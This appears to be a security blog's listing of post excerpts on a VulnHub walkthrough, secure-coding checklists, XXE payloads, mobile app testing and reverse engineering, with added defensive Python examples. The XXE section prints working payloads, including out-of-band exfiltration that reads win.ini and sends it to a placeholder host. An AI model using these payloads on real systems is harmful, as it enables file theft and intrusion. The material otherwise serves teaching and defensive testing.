Posts

Toppo 1 | Walkthrough | VulnHub

This is the latest machine on VulnHub, created by Hadi Mene. So let's begin enumeration with Nmap. Meanwhile I was looking into the page source for information, but nothing special was there, so I fired up Dirb to look for hidden directories. Below is the output of Dirb. I then started looking into all of these directories, and in the admin directory I found a notes.txt file. Below is the output for the same. In notes.txt I found this note: "Note to myself : I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer." As we already know from the Nmap enumeration, ports 22 and 80 are open, so SSH is possible here. I took "ted" as the username (a guess based on the password) and "12345ted123" as the password, and it worked. So what's next? We have a successful login, and now let's move for...

Security-Guide-For-Developers | Security Checklist

Security Checklist. Authentication system (registration / login / two-step verification / password reset):
- Use HTTPS everywhere.
- Store passwords as bcrypt hashes (a salt is required; bcrypt handles that for you).
- Destroy the session ID after logout.
- Destroy all active sessions after a password reset.
- OAuth2 authentication must include the state parameter.
- After a successful login, do not redirect straight to a path supplied with the request; validate it first, otherwise an open redirect makes phishing easy.
- Sanitize javascript://, data:// and CRLF characters when handling user registration/login input.
- Use secure and httpOnly cookies.
- When OTP authentication is used on a mobile device, the OTP (one-time password) must not be returned directly in the response of the generate-OTP or resend-OTP API; deliver it out of band instead (an SMS to the phone, a random code to the mailbox, etc.).
- Limit the number of API calls such as Login, Verify OTP, Resend OTP and Generate OTP for i...
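The post-login redirect and the javascript:/data:/CRLF items are the ones most often implemented wrongly, so here is an added example (mine, not code from the Security-Guide-For-Developers checklist) of a post-login redirect validator in Python. The names `is_safe_redirect`, `login_redirect_target` and the host `app.example` are assumptions made for this illustration; the rules it enforces are the checklist's: same site only, no javascript:/data: schemes, no CRLF.

```python
import re
from urllib.parse import urlsplit

# Tab, CR, LF and the other C0 controls: browsers silently strip some of these from
# URLs, which is how "java\tscript:" style targets slip past naive scheme checks.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def is_safe_redirect(target: str, allowed_host: str) -> bool:
    """Return True only if `target` is a same-site location we are willing to
    send a freshly logged-in user to.

    All of the following must hold:
      * no control characters (blocks CRLF header injection and split schemes)
      * no backslashes (browsers treat "/\\evil.example" as "//evil.example")
      * either a site-absolute path ("/account"), or an absolute https URL whose
        host[:port] is exactly `allowed_host`
      * no other scheme at all, so javascript:, data:, vbscript:, file: fall out
    """
    if not target or _CONTROL_CHARS.search(target) or "\\" in target:
        return False
    try:
        parts = urlsplit(target)
    except ValueError:
        return False
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: must start with exactly one "/" (not "//host").
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme != "https":
        return False
    # Exact netloc match also rejects "user@evil" tricks and unexpected ports.
    return parts.netloc.lower() == allowed_host.lower()


def login_redirect_target(requested: str, allowed_host: str, default: str = "/") -> str:
    """Where to send the user after login: the requested `next` if it passes,
    otherwise a fixed safe default. Never echo the rejected value back."""
    return requested if is_safe_redirect(requested, allowed_host) else default


if __name__ == "__main__":
    for candidate in ("/account", "//evil.example/", "javascript://%0aalert(1)",
                      "https://app.example/account", "https://app.example@evil.example/"):
        print(f"{candidate!r:45} -> {login_redirect_target(candidate, 'app.example')}")
```

The check is deliberately stricter than it strictly needs to be: an explicit port in an absolute URL fails the exact netloc comparison, and a plain http:// URL to the right host is rejected as well, in line with "use HTTPS everywhere".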

Cyber Security and DFIR Interview Questions

Cyber security is an exotic field, and everyone wants to explore this domain and make a career in it, but the problem is they have no idea how to get in, and even if they do, they don't have any idea of what type of questions they might face in an interview. Recently @Miss_Malware asked for everyone's favourite security analyst and DFIR interview questions, which gave me the idea to compile a list of questions that are asked in every interview one way or another. What follows is a list of questions which you may face in an interview. Note: all these questions have been compiled with the help of @Miss_Malware's Twitter thread, contributions from friends and very intelligent internet searches :P. All the relevant sources (read: those I remember) are mentioned at the end of the post. GENERAL: What is DNS? Differentiate between TCP and UDP. How does HTTP handle state? Does TLS use symmetric or asymmetric encryption? What is "Risk"? What is "Risk...

XXE Payloads

Vanilla, used to verify outbound XXE or blind XXE:

    <?xml version="1.0" ?>
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
    ]>
    <r>&sp;</r>

OoB extraction:

    <?xml version="1.0" ?>
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
    %sp;
    %param1;
    ]>
    <r>&exfil;</r>

External DTD (served as ev.xml):

    <!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
    <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">

OoB variation of the above (seems to work better against .NET):

    <?xml version="1.0" ?>
    <!DOCTYPE r [
    <!ELEMENT r ANY >
    <!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
    %sp;
    %param1;
    %exfil;
    ]>

External DTD:

    <!ENTITY % data SYSTEM "file:///c:/win...
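To see what these payloads make a parser do before they are ever sent, here is an added example (not from the post) that feeds them through Python's expat bindings with a callback that records, rather than follows, every external reference. The names `inspect_xml`, `is_xxe` and `accept_xml` are assumptions for this example; the payloads are the two from the post, embedded as constructed test input.

```python
import xml.parsers.expat as expat

# The two payloads from the post, embedded as constructed test input.
VANILLA_XXE = '''<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>'''

OOB_XXE = '''<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>'''


def inspect_xml(doc: str) -> dict:
    """Dry-run a document through expat and record what it asks the parser to do.

    Nothing is fetched: the external-entity callback only logs the URL and tells
    expat to carry on, and expat's default of never expanding parameter entities
    is left in place. What comes back is the information a resolver-enabled
    parser would act on, which is what an inbound XML gate needs to decide on.
    """
    report = {"doctype": None, "entities": [], "external_refs": [], "error": None}
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report["doctype"] = name

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        report["entities"].append(
            {"name": name, "parameter": bool(is_parameter), "system_id": system_id})

    def on_external_ref(context, base, system_id, public_id):
        # A real resolver would open system_id here (http:// or file://); we only log it.
        report["external_refs"].append(system_id)
        return 1  # non-zero means "handled", so parsing continues without any I/O

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(doc, True)
    except expat.ExpatError as exc:
        report["error"] = str(exc)  # declarations seen before the error still count
    return report


def is_xxe(report: dict) -> bool:
    """Flag any entity that points outside the document (SYSTEM id) and any
    parameter entity at all: the OoB payload only declares the fetch of ev.xml in
    the internal subset; the file read and the exfil URL live in the remote DTD."""
    return any(e["system_id"] is not None or e["parameter"] for e in report["entities"])


def accept_xml(doc: str) -> bool:
    """The blunt rule most services can afford: no DOCTYPE at all, hence no
    entities, no external DTD and no entity-expansion bombs."""
    return inspect_xml(doc)["doctype"] is None


if __name__ == "__main__":
    for label, payload in (("vanilla", VANILLA_XXE), ("oob", OOB_XXE)):
        r = inspect_xml(payload)
        print(label, "xxe" if is_xxe(r) else "clean", r["entities"], r["external_refs"])
```

Note the asymmetry the test below checks: the vanilla payload shows up both as an external entity declaration and as an attempted fetch of test.txt, whereas the OoB payload shows only the parameter-entity declaration, because expat does not expand `%sp;` unless told to. A gate that looked only at attempted fetches would therefore miss the OoB variant; looking at the declarations catches both.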

OWASP TOP 10 – 2017 Released After Four years | Open Web Application Security Project

The Open Web Application Security Project (OWASP) has officially released its Top 10 most critical web application security risks. This is the first time the organization has updated the Top 10 since 2013. “Change has accelerated over the last four years, and the OWASP Top 10 needed to change. We’ve completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, rewritten each risk from the ground up, and added references to frameworks and languages that are now commonly used,” OWASP wrote in the Top 10 2017. According to OWASP, some of the significant changes over the past few years that drove the update include micro-services, single-page apps, and the dominance of JavaScript as a primary language on the web. What are the changes in 2017? Injection (SQL injection among others) stays at the top, followed by Broken Authentication. Insecure Direct Object References and Missing Function Leve...

Code Obfuscation

When it comes to the security of an application, source code piracy is one of the major concerns. If your source code is available to attackers, you are in serious trouble: they can easily bypass the security controls you applied, rebuild the application with malicious code snippets, and misuse the business logic used in the application. Obfuscation is the process of renaming the metadata in an assembly so that it is no longer useful to an attacker but remains usable to the runtime for executing the intended operations. It does not modify the actual instructions or mask them from observation by an attacker. Reverse engineering of your proprietary applications by unfair competition or malicious hackers may result in highly undesirable exposure of your algorithms and ideas, proprietary data formats, licensing and security mechanisms, and, most importantly, your customers' data. More details on the forms of code obfuscation are given below. Name Obfuscation: Na...
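To make concrete what "renaming the metadata while leaving the instructions alone" means, here is an added example, not from the post (which is about .NET assemblies), that performs name obfuscation on Python source with the standard `ast` module: every user-defined function, parameter and local is renamed, no statement is touched, and the obfuscated program still behaves identically. The sample licensing code, the `_0, _1, ...` naming scheme and the helper names `obfuscate_names` / `run_function` are all assumptions made for this illustration.

```python
import ast

# Constructed sample: the kind of licensing logic the post says competitors and
# attackers look for. The names are the giveaway; the arithmetic is not.
SAMPLE_SOURCE = '''
def derive_license_key(serial, customer_id):
    checksum = 0
    for ch in serial:
        checksum = (checksum * 31 + ord(ch)) % 65521
    return f"{customer_id}-{checksum:05d}"

def validate_license(serial, customer_id, key):
    return derive_license_key(serial, customer_id) == key
'''


def obfuscate_names(source: str) -> tuple[str, dict[str, str]]:
    """Rename every function, parameter and local the program itself defines.

    Two passes over the tree: the first collects the names the program introduces
    (definitions, parameters, assignment and loop targets), the second rewrites
    every occurrence. Names it never defines (builtins such as ord or len, and
    imported modules) are left alone, so the code keeps calling what it called
    before. Only identifiers change; nothing is added, removed or reordered,
    which is what assembly name obfuscation does to .NET metadata.
    """
    tree = ast.parse(source)
    mapping: dict[str, str] = {}

    def alias(name: str) -> str:
        # Hypothetical naming scheme: _0, _1, _2, ... in first-seen order.
        if name not in mapping:
            mapping[name] = f"_{len(mapping)}"
        return mapping[name]

    for node in ast.walk(tree):  # pass 1: what does this program define?
        if isinstance(node, ast.FunctionDef):
            alias(node.name)
            for arg in node.args.args + node.args.kwonlyargs:
                alias(arg.arg)
        elif isinstance(node, ast.Name) and isinstance(node.ctx, ast.Store):
            alias(node.id)

    for node in ast.walk(tree):  # pass 2: rewrite definitions and uses alike
        if isinstance(node, ast.FunctionDef):
            node.name = mapping[node.name]
            for arg in node.args.args + node.args.kwonlyargs:
                arg.arg = mapping[arg.arg]
        elif isinstance(node, ast.Name) and node.id in mapping:
            node.id = mapping[node.id]

    return ast.unparse(tree), mapping


def run_function(source: str, func_name: str, *args):
    """Execute `source` in a fresh namespace and call one of its functions."""
    namespace: dict = {}
    exec(compile(source, "<module>", "exec"), namespace)
    return namespace[func_name](*args)


if __name__ == "__main__":
    obfuscated, names = obfuscate_names(SAMPLE_SOURCE)
    print(obfuscated)
    key = run_function(SAMPLE_SOURCE, "derive_license_key", "ABC-123", "cust42")
    print(key, run_function(obfuscated, names["validate_license"], "ABC-123", "cust42", key))
```

Reading the obfuscated output makes the post's point: `ord(ch)` and `% 65521` are still right there, so anyone who finds the function can still reimplement the key scheme; what they lose is the label telling them which of the program's functions is worth looking at. Name obfuscation raises the cost of analysis, it does not hide the algorithm.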

Strict SSL Pinning

What is SSL pinning? Why do we need SSL pinning in mobile applications? How do we do it? SSL pinning means hard-coding into the mobile application the certificate known to be used by the server. The app can then ignore the device's trust store and rely on its own, allowing SSL connections only to hosts that present a certificate stored inside the application. This also makes it possible to trust a host with a self-signed certificate without installing additional certificates on the device. SSL Pinning on Android: Simplest Way. PROS of certificate pinning: Increased security - with pinned SSL certificates the app is independent of the device's trust store, so an extra CA certificate installed on the device does not let anyone intercept the app's traffic. Compromising the hard-coded trust store in the app is not so easy: the app would need to be decompiled, changed and then recompiled, and it can't be signed with the same Android keystore that the original developer of the app used. Reduced costs - SSL certificate pinning gives you ...

Mobile Malware You Should Watch Out For

Most prevalent and active malware on mobile devices: DangerousObject.Multi.Generic, Trojan-SMS.AndroidOS.OpFake.bo, AdWare.AndroidOS.Ganlet.a, Trojan-SMS.AndroidOS.FakeInst.a, RiskTool.AndroidOS.SMSreg.cw, Trojan-SMS.AndroidOS.Agent.u, Trojan-SMS.AndroidOS.OpFake.a, Trojan.AndroidOS.Plangton.a, Trojan.AndroidOS.MTK.a, AdWare.AndroidOS.Hamob.a, Android.Geinimi, SMS.AndroidOS.FakePlayer.c, Android.DroidDream AKA Android.Rootcager AKA AndroidOS_Lootoor.A, Android.BgServ AKA Troj/Bgserv-A AKA AndroidOS_BGSERV.A, Android.KungFu variants. More are here: AegisLab, Andr/Plankton-A, Andr/SMSRep-B/C, Android, Android Market, Android OS, Android.Adrd, Android.Adrd.A, Android.Adsms, Android.Basebridge, Android.Bgserv, Android.DroidDream, Android.Fokonge, Android.Geinimi, Android.GGTracker, Android.Gunfu, Android.Hippo, Android.HippoSMS, Android.HongTouTou, Android.Jsmshider, Android.LightDD, Android.Lovetrap, Android.NickiBot, Android.Nickispy, Android.Pja...

Intercepting Mobile Application Traffic

To intercept mobile application traffic you need to put yourself in a man-in-the-middle (MITM) position. This can easily be done with proxies like Burp Suite, Fiddler, Charles, Paros, etc. I prefer Burp Suite, as it is the most flexible for penetration testing. The steps below will help you set up the required interception environment:
1. Install the target application .apk on the mobile device; let's consider an Android device in this case.
2. Go to Menu > Settings > Wi-Fi and connect to the Wi-Fi network shared by your mobile device and your laptop.
3. Find the IP address of your laptop using the "ifconfig" / "ipconfig" command.
4. In your mobile Wi-Fi settings, long-press the connected network and select "Modify Network".
5. Check the option "Show advanced options" and under proxy settings select "Manual". Now enter:
   Proxy hostname: <your laptop IP> ...

Blackberry Application - Reverse Engineering

Java code compiled for the BlackBerry goes through the following steps, using the tools mentioned:
1. The code is compiled with the javac.exe compiler and an application JAR file is generated. At this point, all Java methods, constructs and classes are fair game.
2. The preverify.exe tool is run against the generated JAR file and looks for code constructs that are not allowed in Java ME applications (for example, calls into native code or invalid Java instructions). The pre-verifier is used in both BlackBerry and Java ME development. Once the pre-verifier step completes, the classes are marked as verified.
3. RIM's compiler, rapc.exe, converts the verified JAR file to a BlackBerry executable COD file. rapc is an optimizing compiler that removes symbolic information and adds RIM proprietary instructions to the binary in order to reduce size and improve performance.
4. If the application is going to be deployed to a real device or to a simulator with security enabled, the COD file i...

Jailbreaking - Rooting - Developer Unlock Your Mobile

This part focuses on jailbreaking iOS devices, rooting Android devices and developer-unlocking Windows phones.
Rooting an Android device: rooting your device means allowing applications to run with superuser (root) permissions. There are many ways to root an Android device; below are the steps using Kingo Root:
1. Connect your device to the computer with a data cable and ensure that the home screen is unlocked.
2. Download and install the Kingo Root tool on your computer.
3. After installation, open Kingo Root; it will detect your device (and install drivers for it if they are missing).
4. Click on "Root" to begin patching the binaries. It will take a few minutes to root your device.
5. Once successful, you can install the "SuperUser" app on your Android device, which lets you easily grant root permission to other applications.
Note: if you are rooting a Nexus device, download the Nexus Root Toolkit (NRT) instead of Kingo Root and enjoy your rooted...

Reverse Engineering Mobile Applications

There are many simple ways to do reverse engineering (the first step towards mobile application security). As of today, various mobile platforms are available; we will keep our primary focus on Android, iOS, Windows and BlackBerry.
Reverse engineering an Android mobile app (APK file):
1. Select the APK file you want to reverse engineer. Using any extractor such as 7-Zip, extract the files (an APK is a zip archive).
2. Now you can see a file named classes.dex.
3. Use the tool dex2jar to convert classes.dex into a readable JAR. Command: dex2jar.bat classes.dex
4. Now, using any Java decompiler, you can open the newly converted file "classes_dex2jar". In my case I am using JD-GUI, a free tool.
5. Now you can see all the packages and class files inside it.
6. Look for hard-coded sensitive information in the code (if code is ...
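Step 6, looking for hard-coded secrets, is the part worth automating, and much of it does not even need the decompiler: string literals from Java source are stored as plain text in the DEX string table. The following is an added example (not from the post) that does steps 1 and 2 with Python's `zipfile` module and then runs a `strings`-style sweep over the DEX code and bundled assets. The APK it scans is constructed in memory; the hostnames and values in it are made up (the AWS key is Amazon's documented example key), and `scan_apk`, `build_sample_apk`, `build_archive` and the patterns are my assumptions, not tooling the post mentions.

```python
import io
import re
import zipfile

# What to look for once the DEX string table and bundled assets are readable. The
# patterns are deliberately loose: false positives are cheap at this stage, and the
# point is to surface candidates for a human to check in JD-GUI afterwards.
SECRET_PATTERNS = {
    "url": re.compile(rb"https?://[\w.\-/:%?=&]+"),
    "aws_access_key": re.compile(rb"AKIA[0-9A-Z]{16}"),
    "credential_assignment": re.compile(
        rb"(?i)(?:password|passwd|secret|api[_-]?key)\s*[=:]\s*\S+"),
    "private_key": re.compile(rb"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}


def printable_strings(blob: bytes, min_len: int = 8) -> list[bytes]:
    """Equivalent of the Unix `strings` tool: runs of printable ASCII of at least min_len."""
    return [m.group() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def scan_apk(apk_bytes: bytes) -> list[tuple[str, str, str]]:
    """Open an APK (a zip file) and report suspicious strings in its DEX code and
    bundled assets. Returns (member name, finding kind, matched text) triples."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        names = apk.namelist()
        # Multidex apps carry classes2.dex, classes3.dex, ... alongside classes.dex.
        dex_members = [n for n in names if re.fullmatch(r"classes\d*\.dex", n)]
        if not dex_members:
            raise ValueError("no classes.dex in archive; not an Android package?")
        # assets/ and res/raw/ are where config files and embedded certificates end up.
        targets = dex_members + [n for n in names if n.startswith(("assets/", "res/raw/"))]
        for member in targets:
            for s in printable_strings(apk.read(member)):
                for kind, pattern in SECRET_PATTERNS.items():
                    match = pattern.search(s)
                    if match:
                        findings.append((member, kind, match.group().decode("ascii")))
    return findings


def build_archive(members: dict[str, bytes]) -> bytes:
    """Build an in-memory zip from {name: content}; used to fake APKs for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, content in members.items():
            z.writestr(name, content)
    return buf.getvalue()


def build_sample_apk() -> bytes:
    """Constructed stand-in for a real APK: same zip layout, fake DEX payload."""
    # A real classes.dex is binary, but its string table is plain (M)UTF-8, which is
    # why literals written into Java source survive compilation unchanged.
    fake_dex = (b"dex\n035\x00" + b"\x00" * 16
                + b"Lcom/example/app/LoginActivity;\x00"
                + b"https://api.example.internal/v1/login\x00"
                + b"AKIAIOSFODNN7EXAMPLE\x00"  # Amazon's documented example key
                + b"api_key=sk_live_0123456789abcdef\x00")
    return build_archive({
        "AndroidManifest.xml": b"<manifest/>",
        "classes.dex": fake_dex,
        "assets/config.properties": b"db.host=10.0.0.5\ndb.password=Winter2018!\n",
    })


if __name__ == "__main__":
    for member, kind, text in scan_apk(build_sample_apk()):
        print(f"{member}: {kind}: {text}")
```

Run it against a real APK by passing `open("app.apk", "rb").read()` to `scan_apk`. Expect noise from library code (every HTTP client has URLs in it); the hits worth chasing are the ones in the app's own package, which is where the decompiled classes from step 4 come in.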